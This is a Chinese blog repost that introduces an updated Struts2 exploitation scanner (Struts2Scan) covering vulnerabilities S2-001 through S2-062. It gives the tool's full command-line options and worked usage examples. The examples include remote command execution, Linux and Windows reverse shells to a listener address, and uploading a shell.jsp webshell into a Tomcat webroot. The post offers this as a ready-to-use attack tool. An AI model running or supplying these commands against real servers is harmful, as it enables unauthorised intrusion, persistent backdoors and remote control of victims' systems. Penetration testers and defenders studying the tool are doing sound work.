struts2综合漏洞扫描工具
2023-06-13 09:12:16 时间
大家好,又见面了,我是你们的朋友全栈君。
python扫描工具更新2022-4-16
1.添加了S2-062漏洞利用
其实是对S2-061漏洞的绕过
支持命令执行,Linux反弹shell,windows反弹shell。
2.解决了了Windows反弹shell的功能
底层原理:解决了有效负载Runtime.getRuntime().exec()执行复杂windows命令
不成功的问题。
详情文章:https://www.yuque.com/docs/share/0abe4b7e-45fd-4902-a23a-ad51ab72cbb9?# 《使用java命令执行函数反弹windows-shell》
工具地址https://github.com/Vancomycin-g/Struts2Scan/ 里面有两个工具,一个是python编写的工具,另一个是jar文件 python工具是改变大佬的。jar文件是在网络上找的。
java工具
优点
1.扫描比较稳定 2.误报情况少, 3.可视化,方便操作
缺点
1.无法指定payload进行利用 2.无法反弹shell 3.无S2-061 payload
用法
直接一键扫描就行了,简单粗暴
python工具
优点
1.大多payload支持Linux反弹shell,少部分payload支持windows反弹shell 2.可以自己选可以使用的payload. 3.有S2-061 payload
缺点
1.稳定性优化的还可以,可能存在误报情况, 2.有许多命令参数。
工具介绍
原作者:github地址:https://github.com/HatBoy/Struts2-Scan 感谢原作者开源的工具 此次是在原有的基础上进行升级,优化。 升级内容:
1.添加了S2-061漏洞
2.优化了误报情况。
3.个别添加了windows反弹shell功能。
4.原来参数-r ip:port修改成了,
-lr ip:port 反弹Linuxshell
-wr ip:port反弹Windows shell
5.还有其他细微的地方
Struts2-Scan
- Struts2漏洞利用扫描工具,基于互联网上已经公开的Structs2高危漏洞exp的扫描利用工具,目前支持的漏洞如下: S2-001, S2-003, S2-005, S2-007, S2-008, S2-009, S2-012, S2-013, S2-015, S2-016, S2-019, S2-029, S2-032, S2-033, S2-037, S2-045, S2-046, S2-048, S2-052, S2-053, S2-devMode, S2-057,S2-061,S2-062
- 支持单个URL漏洞检测和批量URL检测,指定漏洞利用,可获取WEB路径,执行命令,反弹shell和上传文件,注意,并不是所有的漏洞均支持上述功能,只有部分功能支持
运行环境
- Python3.6.X及其以上版本
- 第三方库: click, requests, bs4
- 测试环境: Ubuntu 16.04
- 漏洞环境已上传,参考地址:
工具参数说明
Usage: Struts2Scan.py [OPTIONS]
Struts2批量扫描利用工具
Options:
-i, --info 漏洞信息介绍
-v, --version 显示工具版本
-u, --url TEXT URL地址
-n, --name TEXT 指定漏洞名称, 漏洞名称详见info
-f, --file TEXT 批量扫描URL文件, 一行一个URL
-d, --data TEXT POST参数, 需要使用的payload使用{exp}填充, 如: name=test&passwd={exp}
-c, --encode TEXT 页面编码, 默认UTF-8编码
-p, --proxy TEXT HTTP代理. 格式为http://ip:port
-t, --timeout TEXT HTTP超时时间, 默认10s
-w, --workers TEXT 批量扫描进程数, 默认为10个进程
--header TEXT HTTP请求头, 格式为: key1=value1&key2=value2
-e, --exec 进入命令执行shell
--webpath 获取WEB路径
-lr, --Linux_reverse TEXT 反弹Linux shell地址, 格式为ip:port
-wr, --Win_reverse TEXT 反弹Windows shell地址, 格式为ip:port
--upfile TEXT 需要上传的文件路径和名称
--uppath TEXT 上传的目录和名称, 如: /usr/local/tomcat/webapps/ROOT/shell.jsp
-q, --quiet 关闭打印不存在漏洞的输出,只保留存在漏洞的输出
-h, --help Show this message and exit.
使用例子
查看漏洞详细信息:
$ python3 Struts2Scan.py --info
单个URL漏洞检测:
$ python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action
批量漏洞检测:
$ python3 Struts2Scan.py -f urls.txt
指定POST数据:
$ python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action -d name=admin&email=admin&age={exp}
常用方法
# 命令执行
$ python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2-016 -e
# 反弹Linux shell
$ python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2-016 -lr 192.168.100.8:8888
# 反弹Windows shell
$ python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2-016 -wr 192.168.100.8:8888
# 上传shell
$ python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2-016 --upfile shell.jsp --uppath /usr/local/tomcat/webapps/ROOT/shell.jsp
发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/161733.html原文链接:https://javaforall.cn
相关文章
- 【开源分享】QingScan一个批量漏洞挖掘工具。白帽子工具平台
- 常用的web漏洞扫描工具_系统漏洞扫描工具有哪些
- 渗透测试技术_Nessus工具(二) _漏洞扫描工具 Nessus的使用教程
- 干货|盘点那些渗透测试中常用的漏洞扫描工具.....
- 轻量级内网资产探测漏洞扫描工具
- 常见web中间件漏洞总结 | Tomcat Nginx JBoss
- 360本地提权漏洞演示+利用工具 EXP
- Linux服务器还有漏洞?建议使用 OpenVAS 日常检查!
- Nettacker:一款集渗透测试、开源漏洞扫描和漏洞管理于一身的自动化工具
- Ghauri:一款功能强大的SQL注入漏洞自动化检测和利用工具
- toxssin:一款功能强大的XSS漏洞扫描利用和Payload生成工具
- Nightingale:一款针对漏洞评估和渗透测试(VAPT)的Docker渗透测试环境
- CVID:一款功能强大的CVE漏洞信息收集与下载工具
- 闲的无聊时候就手动写第一个漏洞扫描工具吧!详解编程语言
- Linux系统必备:漏洞扫描工具(linux漏洞扫描工具)
- OAuth与OpenID登录工具曝出重大漏洞
- DedeCMS全版本通杀SQL注入漏洞利用代码及工具
- 常见的Web应用漏洞及其解决方法
- 常见的Web应用漏洞及其解决方法
- MySQL漏洞工具:防范数据库安全问题(mysql漏洞工具)
- 研究人员利用多种工具和漏洞找到Windows 365 Cloud PC的用户名和密码
- mysql5.0.45(修改)拒绝服务漏洞